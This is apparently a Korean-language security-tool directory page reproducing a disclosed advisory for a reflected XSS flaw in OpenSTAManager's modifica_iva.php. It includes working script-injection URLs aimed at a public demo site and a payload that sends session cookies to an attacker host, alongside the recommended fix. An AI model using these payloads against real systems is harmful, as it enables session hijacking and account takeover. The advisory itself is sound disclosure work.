Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-24415 — CVE-2026-24415 - OpenSTAManager가 modifica_iva.php의 righe 매개변수를 통한 XSS의 영향을 받음 | Kitploit
도구/GitHubGitHub/lukasz-rybak/cve-2026-24415
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHublukasz-rybak/cve-2026-24415

CVE-2026-24415

CVE-2026-24415 - OpenSTAManager가 modifica_iva.php의 righe 매개변수를 통한 XSS의 영향을 받음

저장소 보기
25개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-24415: OpenSTAManager, modifica_iva.php의 righe 매개변수를 통한 XSS 영향

개요

필드상세
CVE IDCVE-2026-24415
심각도MEDIUM
권고권고 보기
발견자Lukasz Rybak

영향을 받는 제품

  • devcode-it/openstamanager (versions: < 2.9.8)

CWE 분류

  • CWE-79: 웹 페이지 생성 중 입력의 부적절한 중립화 ('Cross-site Scripting')

세부 정보

요약

OpenSTAManager v2.9.8의 여러 반사형 XSS(Cross-Site Scripting) 취약점으로 인해 인증되지 않은 공격자가 조작된 URL 매개변수를 통해 다른 사용자의 브라우저 컨텍스트에서 임의의 JavaScript 코드를 실행할 수 있으며, 이는 세션 하이재킹, 자격 증명 도용 및 무단 작업으로 이어질 수 있습니다.

취약한 매개변수: righe (GET)

세부 정보

OpenSTAManager v2.9.8은 송장/주문/계약 수정 모달에서 여러 반사형 XSS 취약점을 포함하고 있습니다. 애플리케이션은 righe GET 매개변수에서 사용자가 제공한 입력을 HTML 출력에 반영하기 전에 적절히 살균하지 못합니다.

취약한 코드 위치: 파일: /modules/contratti/modals/modifica_iva.php (125번째 줄)

root@kitploit:~
<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">

$_GET['righe'] 매개변수는 htmlspecialchars() 또는 이와 동등한 함수를 사용한 어떠한 살균 없이 HTML value 속성에 직접 출력됩니다. 이를 통해 공격자는 속성 컨텍스트를 벗어나 임의의 HTML/JavaScript를 주입할 수 있습니다.

영향을 받는 모든 파일:

  1. /modules/contratti/modals/modifica_iva.php - 125번째 줄, 167번째 줄
  2. /modules/preventivi/modals/modifica_iva.php - 125번째 줄, 167번째 줄
  3. /modules/fatture/modals/modifica_iva.php - 121번째 줄, 161번째 줄
  4. /modules/ddt/modals/modifica_iva.php - 125번째 줄, 167번째 줄
  5. /modules/ordini/modals/modifica_iva.php - 125번째 줄, 167번째 줄
  6. /modules/interventi/modals/modifica_iva.php - 125번째 줄, 167번째 줄

PoC

전제 조건:

  • 실행 중인 OpenSTAManager v2.9.8 인스턴스
  • 유효한 관리자 자격 증명 (테스트 인스턴스의 경우 username: admin, password: admin)

1단계: 로그인

root@kitploit:~
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

2단계: XSS 트리거 브라우저에서 다음 URL로 이동하거나 (또는 쿠키와 함께 curl 사용):

root@kitploit:~
http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>

테스트된 URL (모두 취약):

  • https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>

예상 결과: 현재 세션 쿠키를 표시하는 JavaScript alert 팝업이 나타나 코드 실행을 확인합니다.

HTML 출력 (라이브 인스턴스에서 확인됨):

root@kitploit:~
<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">

확인:

image
image

대체 페이로드: 세션 도용: "><script>fetch('https://attacker.com/?c='+document.cookie)</script>

영향

영향받는 사용자: 계약, 송장, 견적 또는 주문 모듈에 접근 권한이 있는 모든 인증된 사용자.

공격 시나리오:

  1. 공격자가 XSS 페이로드가 포함된 악성 URL 제작
  2. 공격자가 이메일/채팅/피싱을 통해 피해자에게 URL 전송
  3. 피해자 (인증된 사용자)가 링크 클릭
  4. 악성 JavaScript가 피해자의 브라우저 컨텍스트에서 실행
  5. 공격자는 다음을 수행 가능:
    • 세션 쿠키 도용 → 전체 계정 탈취
    • 피해자 대신 작업 수행 (레코드 생성/수정/삭제)
    • CSRF 토큰 도용 및 CSRF 보호 우회
    • 피싱 페이지로 리디렉션
    • 키로거 주입하여 민감 데이터 캡처
    • 페이지 콘텐츠 수정하여 사용자가 자격 증명을 공개하도록 속임

권장 수정 사항:

root@kitploit:~
<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">

세부 정보 섹션에 나열된 모든 영향을 받는 파일에 이 수정 사항을 적용하세요.

참고 자료

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-jfgp-g7x7-j25j
  • https://nvd.nist.gov/vuln/detail/CVE-2026-24415
  • https://github.com/advisories/GHSA-jfgp-g7x7-j25j

면책 조항

이 CVE는 조정된 취약점 공개 관행에 따라 책임감 있게 공개되었습니다. 여기에 제공된 정보는 교육 및 방어 목적으로만 제공됩니다.

도구 다운로드